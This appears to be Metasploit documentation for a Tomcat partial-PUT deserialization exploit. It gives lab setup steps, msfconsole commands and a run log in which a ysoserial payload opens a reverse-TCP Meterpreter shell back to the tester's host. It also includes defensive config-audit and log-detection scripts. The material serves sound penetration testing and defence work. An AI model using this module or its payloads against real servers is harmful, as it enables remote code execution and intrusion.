metasploit-gs/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
2025-04-02 13:37:39 -07:00

## Vulnerable Application

This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality that can be exploited with a partial PUT to place an attacker-controlled deserialization payload in the work directory. For the exploit to succeed, writes must be enabled for the default servlet, and `org.apache.catalina.session.PersistentManager` must be configured to use `org.apache.catalina.session.FileStore`.

## Setup

Download Ubuntu Server 24:

```
wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso
```

Install Ubuntu on your preferred hypervisor, enabling SSH during installation. Reboot once installation is complete and SSH into the target. Download Tomcat and Java:

```
wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
```

Extract the JDK archive and move it to the appropriate directory:

```
tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
sudo mkdir -p /opt/java
sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8
```

Install unzip and extract Tomcat:

```
sudo apt install unzip -y
sudo unzip apache-tomcat-9.0.90.zip -d /opt/
```

Set `CATALINA_HOME` and `JAVA_HOME`, and update `PATH`, by adding the following to `~/.bashrc`:

```
export CATALINA_HOME=/opt/apache-tomcat-9.0.90
export JAVA_HOME=/opt/java/zulu8
export PATH=$JAVA_HOME/bin:$PATH
```

Apply changes:

```
source ~/.bashrc
```

Change the Tomcat ownership and make the startup scripts executable:

```
sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin
```

Edit `conf/web.xml` and update the default servlet entry to the following (`readonly` set to `false` is what enables PUT and DELETE against the default servlet):

    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

Edit `conf/context.xml` and add the following inside the pre-existing `<Context>` tags:

    <Manager className="org.apache.catalina.session.PersistentManager">
      <Store className="org.apache.catalina.session.FileStore" />
    </Manager>
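The two preconditions listed under Vulnerable Application are both plain configuration facts, so they can be audited offline. The following script is an added example, not part of the module or of Tomcat: it parses `conf/web.xml` and `conf/context.xml` with the standard library, reports whether the `default` servlet has `readonly=false` and whether a `PersistentManager` is backed by a `FileStore`, and only flags the install as exposed when both hold. The sample XML embedded in it is constructed to mirror the fragments in the setup steps above; the file paths in the usage comment are assumptions about a standard `CATALINA_HOME` layout.

```python
"""Audit a Tomcat install for the two settings this module needs:
a writable default servlet and a PersistentManager backed by FileStore."""
import sys
import xml.etree.ElementTree as ET

PERSISTENT_MANAGER = "org.apache.catalina.session.PersistentManager"
FILE_STORE = "org.apache.catalina.session.FileStore"


def _local(tag):
    """Strip an XML namespace prefix: '{uri}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem, name):
    for child in _children(elem, name):
        return (child.text or "").strip()
    return ""


def default_servlet_writable(web_xml):
    """True if the 'default' servlet sets readonly=false, i.e. accepts PUT/DELETE.

    DefaultServlet treats a missing readonly parameter as true, so only an
    explicit 'false' counts as writable.
    """
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet" or _text(servlet, "servlet-name") != "default":
            continue
        for param in _children(servlet, "init-param"):
            if _text(param, "param-name") == "readonly":
                return _text(param, "param-value").lower() == "false"
    return False


def file_store_configured(context_xml):
    """True if any <Manager> is a PersistentManager with a FileStore <Store> child."""
    root = ET.fromstring(context_xml)
    for manager in root.iter():
        if _local(manager.tag) != "Manager" or manager.get("className") != PERSISTENT_MANAGER:
            continue
        if any(s.get("className") == FILE_STORE for s in _children(manager, "Store")):
            return True
    return False


def audit(web_xml, context_xml):
    """Combine both checks; 'exposed' is True only when both preconditions hold."""
    writable = default_servlet_writable(web_xml)
    file_store = file_store_configured(context_xml)
    findings = []
    if writable:
        findings.append("default servlet has readonly=false; set it to true unless clients must PUT")
    if file_store:
        findings.append("PersistentManager uses FileStore; sessions on disk are deserialized on restore")
    return {"writable": writable, "file_store": file_store,
            "exposed": writable and file_store, "findings": findings}


def web_xml_sample(readonly):
    """Constructed conf/web.xml fragment mirroring the default servlet entry above."""
    return f"""<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>{readonly}</param-value></init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>"""


# Constructed conf/context.xml matching the Manager/Store block from the setup steps.
CONTEXT_XML_FILESTORE = """<Context>
  <WatchedResource>WEB-INF/web.xml</WatchedResource>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore" />
  </Manager>
</Context>"""

# Stock context.xml: no Manager element, so Tomcat's default StandardManager is used.
CONTEXT_XML_DEFAULT = """<Context>
  <WatchedResource>WEB-INF/web.xml</WatchedResource>
</Context>"""


if __name__ == "__main__":
    # Usage (assumed layout): python tomcat_audit.py $CATALINA_HOME/conf/web.xml $CATALINA_HOME/conf/context.xml
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as w, open(sys.argv[2]) as c:
            report = audit(w.read(), c.read())
    else:
        report = audit(web_xml_sample("false"), CONTEXT_XML_FILESTORE)
    for line in report["findings"]:
        print("[!]", line)
    print("exposed:", report["exposed"])
```

Run with no arguments to audit the embedded sample (the lab configuration built above, which reports exposed), or pass the two real files to audit a live install. Restoring `readonly` to `true` is enough to close the upload path; switching the store away from `FileStore` removes the deserialization-on-restore path.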

Create the following directory inside the Tomcat root directory and change into it:

```
mkdir -p webapps/ROOT/WEB-INF/lib
cd ./webapps/ROOT/WEB-INF/lib
```

Download the following dependencies (the gadget chain used in the scenario below relies on them):

```
wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
```

Start the vulnerable Tomcat instance:

```
cd /opt/apache-tomcat-9.0.90/bin
./startup.sh
```

## Options

### GADGET

The ysoserial gadget chain to use to obtain RCE.

## Verification Steps

  1. Start `msfconsole`
  2. `use multi/http/tomcat_partial_put_deserialization`
  3. `set RHOST <TARGET_IP_ADDRESS>`
  4. `set RPORT <TARGET_PORT>`
  5. `set GADGET <YSOSERIAL_GADGET>`
  6. `set LHOST eth0`
  7. `check`
  8. `exploit`

## Scenarios

### Apache Tomcat 9.0.90 with JDK 8.0.422 on Ubuntu Server 24, using the Linux Command target

```
msf6 > use multi/http/tomcat_partial_put_deserialization
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
gadget => CommonsCollections6
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > check
[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
[+] 172.16.199.130:8080 - The target is vulnerable.
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Utilizing CommonsCollections6 deserialization chain
[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
[*] Attempting to deserialize session file..
[+] 500 error response usually indicates success :)
[*] Sending stage (24772 bytes) to 172.16.199.130
[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfserver
OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```
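The module output above leaves two traces a defender can look for in the Tomcat access log: a PUT that writes a `.session` file under the web root (both the `check` and the exploit do this) and, shortly afterwards, the HTTP 500 the module treats as a success indicator. The script below is an added example, not part of the module: it parses access log lines in Tomcat's default `AccessLogValve` pattern (common log format), raises a medium alert for every `.session` PUT and upgrades it to high when the same client receives a 500 within a short window. The log lines are constructed for this example; the `Content-Range` header that makes the PUT partial is not present in this log format, so the detection keys only on the path and status sequence.

```python
"""Flag PUTs of '.session' files in a Tomcat access log and correlate each with a
following HTTP 500 from the same client. Log lines follow Tomcat's default
AccessLogValve pattern (common log format) and are constructed for this example."""
import re
from datetime import datetime

CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample: a check-style PUT/DELETE pair, normal traffic, then a PUT
# followed one second later by a 500 for the same client; the last line is an
# unrelated 500 from a different host that must not be attributed.
SAMPLE_LOG = [
    '172.16.199.1 - - [02/Apr/2025:13:33:30 -0700] "PUT /YLNKdGSIcB.session HTTP/1.1" 201 -',
    '172.16.199.1 - - [02/Apr/2025:13:33:31 -0700] "DELETE /YLNKdGSIcB.session HTTP/1.1" 204 -',
    '172.16.199.1 - - [02/Apr/2025:13:34:40 -0700] "GET /index.html HTTP/1.1" 200 11156',
    '172.16.199.1 - - [02/Apr/2025:13:34:48 -0700] "PUT /imNsIsZCCC.session HTTP/1.1" 201 -',
    '172.16.199.1 - - [02/Apr/2025:13:34:49 -0700] "GET / HTTP/1.1" 500 1181',
    '10.0.0.7 - - [02/Apr/2025:13:34:50 -0700] "GET /missing HTTP/1.1" 500 1181',
]


def parse_line(line):
    """Parse one CLF line into a dict, or return None for lines that do not match."""
    m = CLF.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["time"] = datetime.strptime(event["time"], "%d/%b/%Y:%H:%M:%S %z")
    event["status"] = int(event["status"])
    return event


def find_session_put_chains(lines, window_seconds=30):
    """Return one alert per '.session' PUT.

    Severity is 'medium' for the PUT alone (the default servlet should not accept
    writes at all) and 'high' when the same client gets a 500 within the window,
    which is the sequence the module output shows.
    """
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["time"])
    alerts = []
    for i, put in enumerate(events):
        if put["method"] != "PUT" or not put["path"].lower().endswith(".session"):
            continue
        alert = {"host": put["host"], "put_path": put["path"],
                 "put_time": put["time"].isoformat(), "severity": "medium", "error_path": None}
        for later in events[i + 1:]:
            if (later["time"] - put["time"]).total_seconds() > window_seconds:
                break  # events are time-ordered, nothing later can be in the window
            if later["host"] == put["host"] and later["status"] == 500:
                alert["severity"] = "high"
                alert["error_path"] = later["path"]
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_session_put_chains(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['host']} PUT {a['put_path']} at {a['put_time']}"
              + (f", then 500 on {a['error_path']}" if a["error_path"] else ""))
```

Against the sample, the first PUT is reported as medium (its only follow-up is a DELETE) and the second as high because of the 500 one second later; the 500 from `10.0.0.7` is ignored. Feed real `logs/localhost_access_log.*.txt` lines to the function in the same way; if the valve pattern has been customised, adjust the regex to match it.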